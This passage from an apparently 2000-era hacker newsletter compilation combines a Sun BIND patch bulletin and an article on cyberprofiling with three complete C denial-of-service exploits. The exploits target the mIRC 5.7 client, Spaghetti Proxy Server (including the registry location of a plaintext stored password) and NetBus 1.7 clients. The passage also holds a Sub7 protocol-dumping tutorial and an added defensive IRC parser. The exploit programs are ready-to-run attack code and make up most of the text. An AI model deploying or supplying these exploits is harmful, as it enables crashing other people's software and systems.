      PROFIT OR DATA, OR FOR DIRECT, SPECIAL, INDIRECT, CONSEQUENTIAL, INCIDENTAL 
      OR PUNITIVE DAMAGES HOWEVER CAUSED AND REGARDLESS OF ANY THEORY OF LIABILITY 
      ARISING OUT OF THE USE OF OR INABILITY TO USE THE INFORMATION CONTAINED IN 
      THIS SECURITY BULLETIN, EVEN IF SUN MICROSYSTEMS, INC. HAS BEEN ADVISED OF 
      THE POSSIBILITY OF SUCH DAMAGES.
      
      If any of the above provisions are held to be in violation of applicable law, 
      void, or unenforceable in any jurisdiction, then such provisions are waived 
      to the extent necessary for this disclaimer to be otherwise enforceable in 
      such jurisdiction.
      ________________________________________________________________________________
      
      1.  Bulletin Topics
      
          Sun announces the release of patches for Solaris(tm) 7 which relate to 
          four vulnerabilities in BIND reported in CERT Advisory CA-99-14.
              
          Sun recommends that you install the patches listed in section 4 
          immediately on systems running Solaris 7 with Sun's implementation
          of BIND.
          
      2.  Who is Affected
              
          Vulnerable:     Solaris 7 running Sun's implementation of BIND
                       
          Not vulnerable: All other supported versions of Solaris.
          
      3.  Understanding the Vulnerabilities
          
          The Berkeley Internet Name Domain (BIND) is an implementation of the 
          Domain Name System (DNS) protocols.
          
          CERT Advisory CA-99-14 describes six vulnerabilities in certain versions
          of BIND. Solaris 7 is vulnerable to the following four vulnerabilities 
          reported in the CERT advisory.
          
            Vulnerability #3: the "so_linger bug"
          
              Remote attackers may degrade the performance of named.
         
            Vulnerability #4: the "fdmax bug"
      
              Remote attackers may cause named to crash.
         
            Vulnerability #5: the "maxdname bug"
      
              Remote attackers may cause named to crash.
         
            Vulnerability #6: the "naptr bug"
      
              Remote attackers may cause named to crash.
      
          The CERT advisory CA-99-14 is available at:
          
              ftp://info.cert.org/pub/cert_advisories/CA-99-14-bind.txt
              
          No other supported versions of Solaris (including Solaris 8) are 
          affected by any of the six vulnerabilities reported in the CERT 
          advisory.
      
              
      4.  List of Patches
      
          The following patches are available in relation to the above problems.
      
          Solaris version     Patch ID        
          _______________     _________
          Solaris 7 (SPARC)   107018-02
                              106938-03       
          Solaris 7 (Intel)   107019-02
                              106939-03
      _______________________________________________________________________________
      APPENDICES
      
      A.  Patches listed in this bulletin are available to all Sun customers at:
          
            http://sunsolve.sun.com/securitypatch
      
      B.  Checksums for the patches listed in this bulletin are available at:
      
            ftp://sunsolve.sun.com/pub/patches/CHECKSUMS
      
      C.  Sun security bulletins are available at:
      
            http://sunsolve.sun.com/security
              
      D.  Sun Security Coordination Team's PGP key is available at:
      
            http://sunsolve.sun.com/pgpkey.txt
                                          
      E.  To report or inquire about a security problem with Sun software, contact 
          one or more of the following:
        
              - Your local Sun Solution Center
              - Your representative computer security response team, such as CERT 
              - Sun Security Coordination Team. Send email to:
               
                      security-alert@sun.com
      
      F.  To receive information or subscribe to our CWS (Customer Warning System) 
          mailing list, send email to:
          
                      security-alert@sun.com
         
          with a subject line (not body) containing one of the following commands:
      
              Command         Information Returned/Action Taken
              _______         _________________________________
      
              help            An explanation of how to get information
              
              key             Sun Security Coordination Team's PGP key
              
              list            A list of current security topics
      
              query [topic]   The email is treated as an inquiry and is forwarded to 
                              the Security Coordination Team
      
              report [topic]  The email is treated as a security report and is
                              forwarded to the Security Coordination Team. Please 
                              encrypt sensitive mail using Sun Security Coordination
                              Team's PGP key
      
              send topic      A short status summary or bulletin. For example, to 
                              retrieve a Security Bulletin #00138, supply the 
                              following in the subject line (not body):
                              
                                      send #138
      
              subscribe       Sender is added to our mailing list.  To subscribe, 
                              supply the following in the subject line (not body):
      
                                      subscribe cws your-email-address
                              
                              Note that your-email-address should be substituted
                              by your email address.
                              
              unsubscribe     Sender is removed from the CWS mailing list.
      ________________________________________________________________________________
      
      Copyright 2000 Sun Microsystems, Inc. All rights reserved. Sun, 
      Sun Microsystems, Solaris and SunOS are trademarks or registered trademarks 
      of Sun Microsystems, Inc. in the United States and other countries. This 
      Security Bulletin may be reproduced and distributed, provided that this 
      Security Bulletin is not modified in any way and is attributed to 
      Sun Microsystems, Inc. and provided that such reproduction and distribution 
      is performed for non-commercial purposes.
      
      
      
      @HWA            
      
258.0 Cyberprofiling
      ~~~~~~~~~~~~~~
      
      Source: http://www.infosecuritymag.com/
      


      DIGITAL FORENSICS SIDEBAR - CYBERPROFILING

      CyberCrime Watch
      
      Computers don't commit electronic breaches. People do.
      BY TERRY M. GUDAITIS

      Contrary to depictions in Hollywood movies, those responsible for the 
      majority of cybercrimes, hacking incidents and cyberdeviant acts cannot 
      be "profiled" as a certain demographic type. Cyberstalkers and online 
      child pornographers do not look deviant; in fact, they are as diverse as 
      the employee population of any company. Consider, for example, two recent 
      perpetrators: the former head of Disney's Go Network, Patrick Naughton, who 
      has been charged with trying to meet a 13-year-old girl he encountered in 
      an Internet chat room, allegedly with the intent to have sex with her; and 
      Harvard Divinity School's former dean, Ronald Thiemann, who was dismissed 
      for storing child pornography on his office PC. 

      Many infosecurity practitioners think about their work within a purely 
      technical context: firewalls, routers, switches, monitoring software and 
      so on. This is particularly the case when it comes to cyberforensics. 
      While it's clear that a technical approach to forensics is critical to 
      uncovering evidence from computer-based crimes, the tendency to focus on 
      technology alone comes at the expense of an equally important activity: 
      cybercrime profiling. 

      One aspect of infosec that is consistently overlooked, underestimated or 
      incorrectly defined is the human dimension. Humans are the catalysts 
      behind the keyboards and modems used to conduct computer crimes. 
      Consequently, anyone who has responsibility for systems security, incident 
      response teams, business continuity planning and IT hiring must understand 
      the implications of online behavior and computer use beyond purely 
      technical considerations. They must understand how to identify 
      cyberdeviant behavior, how to identify the perpetrators, how to protect 
      the innocent and how to reduce organizational vulnerability. 

      What Is Cyberprofiling?
      
      Profiling is the process by which a crime scene is observed, evaluated and 
      assessed from behavioral, psychological and criminological perspectives in 
      order to provide sociological insight into the offending individual(s). The 
      concept behind criminal profiling is that weapons do not commit the 
      crimes--people do. Put in a technical context, computers don't hack--hackers 
      do. The individuals who are penetrating systems, launching distributed 
      denial-of-service attacks and defacing Web pages are the problem, not the 
      advancing technologies and the availability of hacking scripts on the 
      Internet. Profiling provides the necessary means to assess and understand 
      the perpetrators of these electronic crimes. 

      For decades, criminal or psychological profiling has been used by law 
      enforcement and the intelligence community to assess criminals, groups, 
      organizations, cultures and, most notably, serial killers. Analogously, 
      most hackers do not hack just once. They have a pattern, an MO and a 
      "signature." The use of criminal profiling in a technical setting is an 
      effective tool to narrow the suspect pool, provide insight into the 
      motivation of the perpetrator, possibly predict the hacker's next move 
      (which, in recent notable cases, involved attempted extortion) and, 
      ultimately, assist in the interview and interrogation process of an 
      identified perpetrator. 

      When assessing a conventional crime scene, investigators enlist the 
      assistance of relevant professionals, including demolitions experts, 
      medical examiners, fingerprint examiners, ballistics experts and 
      psychological profilers. Cyberprofiling involves a similar process, with 
      technical experts, systems administrators, Web programmers, Unix experts, 
      Windows gurus and antivirus specialists. The added tool of profiling 
      centers on the behavior of the perpetrator. 

      When used in conjunction with technical forensics tools, cyberprofiling 
      helps you:
      
        - Narrow the suspect pool
        - Identify single or multiple perpetrators
        - Determine an organization's vulnerabilities
        - Predict perpetrator behavior
        - Mitigate an incident
        - Supplement the interview or interrogation process
        - Assist in the evidence collection and prosecution
        - Provide suggestions and follow-up post-incident

      Profiling Myths and Legends
      
      The depiction of criminal and psychological profiling in movies and on TV 
      often misrepresents what profiling really is...and how a profile is 
      generated.
      
        - Profiling is not psychological testing; and psychological testing does 
          not derive a profile.
        - Profiling is not a static process; people are dynamic and distinct, 
          and the process of profiling must be dynamic and evolving.
        - Profiling is not inductive. It is not studying data, creating a 
          template and applying that template to criminal incidents.
        - Profiling is conducted on a case-by-case basis. The profile is derived 
          deductively from that case-specific data.

      The most important thing to realize is that every case is distinct: There 
      is no one hacker profile! 

      In the never-ending battle against computer crime, companies have invested 
      substantial capital in advanced computer forensics tools and intrusion 
      detection technologies. At the same time, organizations have spent a great 
      deal of money educating employees on combating hostile work environments, 
      discrimination and sexual harassment. For cyberforensics to be a complete 
      science, the same level of emphasis and funding must be devoted to the 
      "human side" of computer crime investigation. 

      TERRY M. GUDAITIS, Ph.D. (terry.gudaitis@cip.saic.com), is a criminal 
      profiler in the High-Tech Criminal Investigations unit of Global Integrity 
      Corp. 

 
      @HWA            
      
      
259.0 mIRC 5.7 Exploit code
      ~~~~~~~~~~~~~~~~~~~~~
      
      Use blind spoofing to crash the mIRC client by sending malformed
      server messages.
      
      /*
      diemirc.c - mIRC 5.7 denial of service exploits.
      (c) Chopsui-cide/MmM '00
      The Mad Midget Mafia - http://midgets.box.sk/
      
      Disclaimer: this program is proof of concept code, and
      is not intended to be used maliciously. By using this
      code, you take all responsibility for any damage incurred
      by the use of it.
      
      This program listens on port 6667 for incoming connections,
      then crashes mIRC using the exploit you choose.
      */
      
      #include <winsock.h>
      #include <conio.h>  // getch()
      #include <stdio.h>
      #include <stdlib.h> // exit()
      #include <string.h> // memset(), strcat(), strlen()
      
      #define LISTEN_PORT 6667
      #define TARGET_NICK "Chopsui-cide"
      
      void listen_sock(int sock, int port);
      void die(char *message);
      int poll_for_connect(int listensock);
      int select_sploit();
      
      void exploit1(int s);
      void exploit2(int s);
      void exploit3(int s);
      void exploit4(int s);
      
      int main(void)
      {
              int ls;
              int c;
              WSADATA wsaData;
              WORD wVersionRequested;
              wVersionRequested = MAKEWORD(1, 1);
              if (WSAStartup(wVersionRequested, &wsaData) < 0) die("Unable to initialise Winsock.");
              if ((ls = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) die("Unable to create socket.");
              c = select_sploit();
              listen_sock(ls, LISTEN_PORT);
              printf("Waiting for connection on port %d...\n", LISTEN_PORT);
              ls = poll_for_connect(ls);
              switch (c)
              {
                      case 0 :
                              exploit1(ls);
                      break;
                      case 1 :
                              exploit2(ls);
                      break;
                      case 2 :
                              exploit3(ls);
                      break;
                      case 3 :
                              exploit4(ls);
              }
              closesocket(ls);
              return 0;
      }
      
      void listen_sock(int sock, int port)
      {
              struct sockaddr_in addr;
              int c = 0;
      
              memset(&addr, 0, sizeof(addr)); // Zero the whole struct, padding included
      
              addr.sin_family = AF_INET;
              addr.sin_addr.s_addr = INADDR_ANY;
              addr.sin_port = htons(port);
      
              if (bind(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1) die("Error binding socket.");
              if (listen(sock, 20) == -1) die("Error listening.");
      }
      
      void die(char *message)
      {
              printf("Fatal error: %s\n", message);
              exit(1);
      }
      
      int poll_for_connect(int listensock)
      {
              struct sockaddr_in peer;
              int sendsock;
              int szpeer = sizeof(peer);
              do
              {
                      sendsock = accept(listensock, (struct sockaddr *) &peer, &szpeer);
              } while(sendsock == -1);
              printf("Connection from [%s].\n", inet_ntoa(peer.sin_addr));
              return sendsock;
      }
      
      #define last_select 3
      int select_sploit()
      {
              char k;
              printf("Select exploit:\n0 - incomplete nick change.\n");
              printf("1 - msg with loads of parameters.\n2 - incomplete mode change.\n");
              printf("3 - incomplete kick.\n");
              k = getch();
              // k is a single character, not a C string, so compare it directly
              // against the digits '0'..'3' instead of passing it to atoi().
              if (k < '0' || k > '0' + last_select)
              {
                      printf("Invalid selection.\n");
                      exit(1);
              }
              return k - '0';
      }
      
      /*
      Exploit 1: incomplete nick change
      mIRC 5.7 and past versions seem to suffer from bugs
      involving incomplete messages. I previously e-mailed
      Khaled M. Bey about one such bug, and it's fixed in
      this version, but there are other similar (almost
      identical) bugs still in v5.7.
      This attack is executed from the _server_ side.
      All we need to do is send the client a half complete
      nick change message, ie
      ":<targetnick>!ident@host.com NICK"
      We must put the target's current nick name where
      <targetnick> is.
      */
      #define END_NICK "!ident@host.com NICK\x0a" // Named distinctly from exploit 3's END
      void exploit1(int s)
      {
              char sod[256];
              memset(sod, '\0', 256);
              sod[0] = ':';
              strcat(sod, TARGET_NICK);
              strcat(sod, END_NICK);
              send(s, sod, 256, 0);
              Sleep(1000); // Make sure the packet gets there.
      }
      
      /*
      Exploit 2: server message overflow
      If the client is sent a large message with too many
      parameters, it crashes, and part of the buffer is
      stuffed into EAX.
      */
      #define MSG_LEN 1000 // This must be an even number.
      void exploit2(int s)
      {
              char sod[MSG_LEN];
              int c = 0;
              do
              {
                      sod[c] = 0xff;
                      sod[c + 1] = ' ';
                      c += 2;
              } while(c < MSG_LEN);
              send(s, sod, MSG_LEN, 0);
              Sleep(1000); // Make sure the packet gets there.
      }
      
      /*
      Exploit 3: incomplete mode change
      This is basically the same as the nick change
      exploit.
      */
      #define END "!ident@host.com MODE\x0a"
      void exploit3(int s)
      {
              char sod[256];
              memset((char *)&sod, '\0', 256);
              sod[0] = ':';
              strcat(sod, TARGET_NICK);
              strcat(sod, END);
              send(s, sod, 256, 0);
              Sleep(1000); // Make sure the packet gets there.
      }
      
      /*
      Exploit 4: incomplete kick
      Another incomplete message bug.
      */
      #define JOIN " JOIN #\x0a"
      #define KICK ": KICK #\x0a"
      void exploit4(int s)
      {
              char sod[256];
              memset((char *)&sod, '\0', 256);
              sod[0] = ':';
              strcat(sod, TARGET_NICK);
              strcat(sod, JOIN);
              printf("%s%s", sod, KICK);
              send(s, sod, strlen(sod), 0);
              send(s, KICK, strlen(KICK), 0);
              Sleep(1000); // Make sure the packet gets there.
      }
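
      The defensive counterpart to the incomplete-message bugs above, as an
      added example that is not part of the original program or of mIRC: an
      RFC 1459-style parser that splits a server line into prefix, command
      and parameters and refuses any command that arrives with fewer
      parameters than it requires, which is the check a client needs before
      acting on NICK, MODE or KICK. The minimum-parameter table and the
      sample lines are constructed for this example.

```c
/* Added example (not from the article or from mIRC): RFC 1459-style parser that rejects incomplete commands. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define IRC_MAX_LINE   512   /* RFC 1459 line limit, CRLF included */
#define IRC_MAX_PARAMS 15    /* RFC 1459 parameter limit */

typedef struct {
    char        line[IRC_MAX_LINE];     /* private copy; parsing writes NULs into it */
    const char *prefix;                 /* NULL when the message carries no prefix */
    const char *command;
    const char *params[IRC_MAX_PARAMS];
    int         nparams;
} irc_msg;

/* Minimum parameter count per command (table constructed for this example from RFC 1459). */
static int irc_min_params(const char *cmd)
{
    static const struct { const char *name; int n; } table[] = {
        { "NICK", 1 }, { "MODE", 1 }, { "KICK", 2 }, { "JOIN", 1 },
        { "PRIVMSG", 2 }, { "NOTICE", 2 }, { "PING", 1 },
    };
    size_t i;
    for (i = 0; i < sizeof table / sizeof table[0]; i++)
        if (strcmp(table[i].name, cmd) == 0) return table[i].n;
    return 0; /* unknown command: no requirement known */
}

/* Returns 0 on success; -1 empty/overlong, -2 prefix without command,
 * -3 malformed command, -4 too many parameters, -5 too few for the command. */
int irc_parse(const char *raw, irc_msg *m)
{
    char *p, *end, *cmd;
    size_t len = strlen(raw);
    int digits = 0, letters = 0;

    memset(m, 0, sizeof *m);
    if (len == 0 || len >= IRC_MAX_LINE) return -1;
    memcpy(m->line, raw, len + 1);
    end = m->line + len;                                 /* strip trailing CR/LF */
    while (end > m->line && (end[-1] == '\r' || end[-1] == '\n')) *--end = '\0';

    p = m->line;
    if (*p == ':') {                                     /* optional ":prefix " */
        m->prefix = ++p;
        while (*p && *p != ' ') p++;
        if (p == m->prefix || *p == '\0') return -2;     /* empty prefix, or nothing after it */
        *p++ = '\0';
    }
    while (*p == ' ') p++;
    if (*p == '\0') return -2;
    cmd = p;
    while (*p && *p != ' ') p++;
    if (*p) *p++ = '\0';
    m->command = cmd;
    for (end = cmd; *end; end++) {                       /* letters only, or a 3-digit reply */
        if (isdigit((unsigned char)*end)) digits++;
        else if (isalpha((unsigned char)*end)) letters++;
        else return -3;
    }
    if (!((letters && !digits) || (digits == 3 && !letters))) return -3;
    while (*p) {                                         /* middle params, then ":trailing" */
        while (*p == ' ') p++;
        if (*p == '\0') break;
        if (m->nparams == IRC_MAX_PARAMS) return -4;
        if (*p == ':') { m->params[m->nparams++] = p + 1; break; }
        m->params[m->nparams++] = p;
        while (*p && *p != ' ') p++;
        if (*p) *p++ = '\0';
    }
    if (m->nparams < irc_min_params(m->command)) return -5;  /* incomplete: drop it */
    return 0;
}

/* Result code only, for callers that just need accept/reject. */
int irc_check(const char *raw)
{
    irc_msg m;
    return irc_parse(raw, &m);
}

int main(void)
{
    /* Constructed samples: the incomplete lines the exploits above send, then well-formed ones. */
    const char *samples[] = {
        ":Chopsui-cide!ident@host.com NICK\n", ":Chopsui-cide!ident@host.com MODE\n", ": KICK #\n",
        ":Chopsui-cide!ident@host.com NICK :NewNick\r\n",
        ":Chopsui-cide!ident@host.com KICK #chan Victim :bye\r\n",
    };
    size_t i;
    for (i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        irc_msg m;
        int rc = irc_parse(samples[i], &m);
        if (rc == 0) printf("ok   %s with %d parameter(s)\n", m.command, m.nparams);
        else         printf("DROP rc=%d: %s", rc, samples[i]);
    }
    return 0;
}
```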
      
      @HWA      
      
260.0 Spaghetti proxy server exploit code
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      /*
      sps3.c - Spaghetti Proxy Server 3.0 DoS attack
      (c) Chopsui-cide/MmM '00
      The Mad Midget Mafia - http://midgets.box.sk/
      
      Spaghetti Proxy Server claims to offer "complete security". In
      reality, it does the exact opposite. As well as being vulnerable
      to a rather simple bug, it stores your RAS username and password in
      plaintext in the registry keys:
      HKEY_LOCAL_MACHINE\SOFTWARE\aVirt\Gateway Home\3.0\RAS\RASPassword
      and
      HKEY_LOCAL_MACHINE\SOFTWARE\aVirt\Gateway Home\3.0\RAS\RASUserName
      
      This simple program will cause SPS to crash. It does not appear as
      though arbitrary code could be executed using this vulnerability.
      
      Usage: sps3 <host>
      */
      
      #include <winsock.h>
      #include <stdio.h>
      #include <stdlib.h> // exit()
      #include <string.h> // memset(), memcpy()
      
      #define PORT 38126
      #define LEN 33
      
      void fatal_error(char *message);
      int connect_sock(int sock, char *host, int port);
      int create_sock();
      
      int main(int argc, char *argv[])
      {
              WSADATA wsaData;
              WORD wVersionRequested;
              int sock;
              char str[LEN];
              if (argc < 2)
              {
                      printf("Usage: sps3     <host>\n");
                      exit(0);
              }
              wVersionRequested = MAKEWORD(1, 1);
              if (WSAStartup(wVersionRequested, &wsaData) < 0) fatal_error("Unable to initialise Winsock.");
              if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) fatal_error("Unable to create socket.");
              connect_sock(sock, argv[1], PORT);
              memset(str, 'X', LEN);
              send(sock, str, LEN, 0);
              Sleep(5000); // This may obviously have to be increased.
              closesocket(sock);
              printf("Done\n");
      }
      
      int connect_sock(int sock, char *host, int port)
      {
              struct sockaddr_in addr;
              struct hostent *he;
      
              memset(&addr, 0, sizeof(addr)); // Zero the whole struct, padding included

              addr.sin_family = AF_INET;
              addr.sin_port = htons(port);

              // Resolve a host name first, otherwise fall back to a dotted-quad address.
              if ((he = gethostbyname(host)) != NULL) memcpy((char *)&addr.sin_addr, he->h_addr, he->h_length);
              else if ((addr.sin_addr.s_addr = inet_addr(host)) == INADDR_NONE) fatal_error("Invalid host.");
              if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1) fatal_error("Error connecting.");
              printf("Connected to %s:%d\n", host, port);
              return 0;
      }
      
      void fatal_error(char *message)
      {
              printf("Fatal error: %s\n", message);
              exit(1);
      }
      
      
      
      @HWA            
            
261.0 schoolbus.c - netbus 1.7 client exploit crashes script kids box
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      /*
      schoolbus.c - Remote DoS exploit for NetBus 1.7 client
      (c) -Chopsui-cide/[M-m-M]- 1999
      The Mad Midget Mafia [M-m-M] - http://underground2.4mg.com/
      
      A nice anti-lamer device - freezes NetBus 1.7, sometimes taking the
      rest of the system with it (on slow systems).
      */
      
      #include <winsock.h>
      #include <conio.h>
      #include <io.h>
      #include <stdio.h>
      #include <stdlib.h> // exit(), atoi()
      #include <string.h> // strlen()
      
      #define CRASHLEN 80000
      char *ver = "NetBus 1.7";
      char *message = "Message; Uh oh! You've been screwed, you talentless script kiddie.";
      char cr[] = {0, 13};
      
      void listen_sock(int sock, int port); // Starts the socket listening
      void die(char *message); // Fatal error
      int poll_for_connect(int listensock); // Wait for connect
      void bye_bye_script_kiddie(int sock); // Sends the crash :)
      
      int main(int argc, char *argv[])
      {
              WSADATA wsaData; 
              WORD wVersionRequested; 
              int listensock;
              int sendsock;
              int c = 0;
              if (argc < 2)
              {
                      puts("Usage: schoolbus <listenport>");
                      exit(0);
              }
              wVersionRequested = MAKEWORD(1, 1);
              if (WSAStartup(wVersionRequested, &wsaData) < 0) die("Unable to initialise Winsock.");
              if ((listensock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) die("Unable to create socket.");
              if ((sendsock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) die("Unable to create socket.");
              listen_sock(listensock, atoi(argv[1]));
              do
              {
                      puts("Listening...");
                      sendsock = poll_for_connect(listensock);
                      bye_bye_script_kiddie(sendsock);
                      closesocket(sendsock);
              } while(!kbhit());
              getch();
              closesocket(listensock);
              return 0;
      }
      
      void listen_sock(int sock, int port)
      {
              struct sockaddr_in addr;
              int c = 0;
              
              memset(&addr, 0, sizeof(addr)); // Zero the whole struct, padding included

              addr.sin_family = AF_INET;
              addr.sin_addr.s_addr = INADDR_ANY;
              addr.sin_port = htons(port);

              if (bind(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1) die("Error binding socket.");
              if (listen(sock, 20) == -1) die("Error listening.");
      }
      
      void die(char *message)
      {
              printf("Fatal error: %s\n", message);
              exit(1);
      }
      
      int poll_for_connect(int listensock)
      {
              struct sockaddr_in peer;
              int sendsock;
              int szpeer = sizeof(peer);
              do
              {
                      sendsock = accept(listensock, (struct sockaddr *) &peer, &szpeer);
              } while(sendsock == -1);
              printf("Connection from [%s].\n", inet_ntoa(peer.sin_addr));
              return sendsock;
      }
      
      void bye_bye_script_kiddie(int sock)
      {
              int d = 0;
              char tmp[CRASHLEN];
              puts("Crashing...");
              do
              {
                      tmp[d] = 'X';
                      d++;
              } while(d < CRASHLEN);
              if (send(sock, ver, strlen(ver), 0) == -1) die("Send error.");
              if (send(sock, cr, 2, 0) == -1) die("Send error.");
              if (send(sock, message, strlen(message), 0) == -1) die("Send error."); // Send our bye bye
                                                                                                                                                         // message.
              if (send(sock, cr, 2, 0) == -1) die("Send error.");
              Sleep(1000); // Wait a second so they see the message, then....
              if (send(sock, "Message; ", 9, 0) == -1) die("Send error."); // Teach them a lesson :)
              if (send(sock, tmp, CRASHLEN, 0) == -1) die("Send error.");
              if (send(sock, cr, 2, 0) == -1) die("Send error.");
              Sleep(3000); // Make sure all the data got sent (may need adjustment).
              printf("Send complete: another one bites the dust!\n\n");
      }
      
      
      @HWA                  
      
262.0 Protocol reverse engineering using Sub7 as an example
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       

      Reverse engineering protocols by example
      Chopsui-cide[MmM] 2000
      The Mad Midget Mafia - http://midgets.box.sk/
      E-mail: chopsuicide@mail.box.sk
      =============================================================================
      
      Introduction:
      ===============
      The skills taught in this text can be used for a variety of purposes, such as
      open-sourcing programs and documenting protocols. It is a newbie text, so
      don't expect anything too exciting. As our example, we will examine _some_
      of the SubSeven protocol, and write some code to implement some of it (in C).
      It should be noted that this was written on and for Windows, but should be
      applicable to the Unix environment as well (to some degree). 
      
      Examining the protocol
      ==========================
      Throughout this tutorial, we will examine the SubSeven 2.1 Gold protocol.
      First, we will need to obtain a dump of some of the protocol. For this we
      will use the following C source:
      //------------------------------- *snip* -------------------------------
      // dumpprot.c
      #include <winsock.h>
      #include <conio.h>  // getch()
      #include <stdio.h>
      #include <stdlib.h> // exit()
      #include <string.h> // memset(), memcpy()
      
      // This program acts like a proxy. It dumps all traffic to stdout.
      #define LOOP_BACK "127.0.0.1"
      #define LIS_PORT 2000
      #define CON_PORT 27374
      #define MAX_PACKET_SIZE 2048
      
      void fatal_error(char *msg);
      void bnd_n_lsn(int sock, int port);
      int connect_sock(int sock, char *host, int port);
      void server_side_thread(void *param);
      void client_side_thread(void *param);
      
      int ss, cs, ls; // Server socket, client socket, listen socket.
      void main()
      {
              WSADATA data; 
              WORD ver;
              DWORD thid; // CreateThread writes a 32-bit thread id through the LPDWORD below
              HANDLE h;
              struct sockaddr_in peer;
              int szpeer;
              ver = MAKEWORD(1, 1);         
              if (WSAStartup(ver, &data) < 0) fatal_error("Unable to initialise Winsock.");
              if ((ss = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) fatal_error("Could not create socket.");
              if ((cs = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) fatal_error("Could not create socket.");
              if ((ls = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) fatal_error("Could not create socket.");
      
              // Wait for connect from client.
              printf("Waiting for connection...");
              bnd_n_lsn(ls, LIS_PORT);
              szpeer = sizeof(peer);
              do
              {
                      cs = accept(ls, (struct sockaddr *)&peer, &szpeer);
              } while(cs == -1);
              printf("accepted from [%s].\n", inet_ntoa(peer.sin_addr));
              closesocket(ls); // We won't be needing this...
      
              // Now, connect the server socket.
              printf("Connecting to [%s]...", LOOP_BACK);
              connect_sock(ss, LOOP_BACK, CON_PORT);
              // We can now begin relaying.
              printf("\nLinked: [%s]<->[%s]\n", inet_ntoa(peer.sin_addr), LOOP_BACK);
      
              // Start threads and wait for a key to be pressed.
              h = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)client_side_thread, (LPVOID)0, 0, (LPDWORD)&thid);
              SetThreadPriority(h, THREAD_PRIORITY_BELOW_NORMAL);
              h = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)server_side_thread, (LPVOID)0, 0, (LPDWORD)&thid);
              SetThreadPriority(h, THREAD_PRIORITY_BELOW_NORMAL);
              getch();
      
              // Clean up a bit.
              closesocket(ss);
              closesocket(cs);
              return; // Exit
      }
      
      void fatal_error(char *msg)
      {
              printf("Fatal error: %s\n", msg);
              exit(1);
      }
      
      void bnd_n_lsn(int sock, int port) // Bind and listen on the socket
      {
              struct sockaddr_in addr;

              memset(&addr, 0, sizeof(addr)); // Zero the whole struct, padding included

              addr.sin_family = AF_INET;
              addr.sin_addr.s_addr = INADDR_ANY;
              addr.sin_port = htons(port);

              if (bind(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1) fatal_error("Error binding socket.");
              if (listen(sock, 20) == -1) fatal_error("Error listening.");
      }
      
      int connect_sock(int sock, char *host, int port)
      {
              struct sockaddr_in addr;
              struct hostent *he;     
      
              memset(&addr, 0, sizeof(addr)); // Zero the whole struct, padding included

              addr.sin_family = AF_INET;
              addr.sin_port = htons(port);

              // Resolve a host name first, otherwise fall back to a dotted-quad address.
              if ((he = gethostbyname(host)) != NULL) memcpy((char *)&addr.sin_addr, he->h_addr, he->h_length);
              else if ((addr.sin_addr.s_addr = inet_addr(host)) == INADDR_NONE) fatal_error("Invalid host.");
              if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1) return -1;
              return 0;
      }
      
      void server_side_thread(void *param)
      {
              char buf[MAX_PACKET_SIZE];
              int r;
              do
              {
                      memset(buf, 0, MAX_PACKET_SIZE);
                      // Leave one byte free so the buffer stays NUL-terminated for printf("%s").
                      r = recv(ss, buf, MAX_PACKET_SIZE - 1, 0);
                      if (r > 0)
                      {
                              // %s stops at the first NUL byte, so binary content inside
                              // a message is invisible here (hence the hex dump later).
                              printf("Server: [%s]\n", buf);
                              send(cs, buf, r, 0); // Forward to client socket
                      }
              } while(r > 0); // 0 = peer closed, -1 = error; stop relaying either way
              printf("Server socket died.\n");
              exit(0);
      }

      void client_side_thread(void *param)
      {
              char buf[MAX_PACKET_SIZE];
              int r;
              do
              {
                      memset(buf, 0, MAX_PACKET_SIZE);
                      r = recv(cs, buf, MAX_PACKET_SIZE - 1, 0);
                      if (r > 0)
                      {
                              printf("Client: [%s]\n", buf);
                              send(ss, buf, r, 0); // Forward to server socket
                      }
              } while(r > 0); // 0 = peer closed, -1 = error; stop relaying either way
              printf("Client socket died.\n");
              exit(0);
      }
      //------------------------------- *snip* -------------------------------
      
      Configure your Sub7 server to listen to port 27374, and set the password to
      "hello". Run it. For God's sake make sure you are either NOT connected to any
      IP networks, or configure your firewall to block any traffic to port 27374
      from anything but your system's loop-back address. Compile and run
      dumpprot.c. Connect to port 2000 with the Sub7 client. Now, do the following,
      and _only_ the following (your dump of the protocol should be the same as the
      one shown here).
      1) Enter the password ("hello").
      2) Select "keys/messages".
      3) Click on "msg manager".
      4) Select "Warning" as the icon.
      5) Select "Yes, no, cancel" as the buttons.
      6) Enter "title" as the message title.
      7) Enter "text" as the message text.
      8) Click on "send message".
      9) Respond by clicking on "yes".
      10) Repeat steps 8 and 9, but this time select "no".
      11) Change the icon to "error".
      12) Send the message (select "yes").
      13) Change the button to "OK".
      14) Send the message.
      15) Exit dumpprot.
      
      Your results should look like this:
      [snip]
      Waiting for connection...accepted from [127.0.0.1].
      Connecting to [127.0.0.1]...
      Linked: [127.0.0.1]<->[127.0.0.1]
      Server: [PWD]
      Client: [PWDhello]
      Server: [connected. 19:54.08 - April 5, 2000, Wednesday, version: GOLD 2.1]
      Client: [MW:51titleZJXXtext]
      Server: [user clicked : Yes.]
      Client: [MW:51titleZJXXtext]
      Server: [user clicked : No.]
      Client: [MW:53titleZJXXtext]
      Server: [user clicked : Yes.]
      Client: [MW:03titleZJXXtext]
      Server: [user clicked : Ok.]
      [snip]
      
      Let's break this down a little:
      [snip]
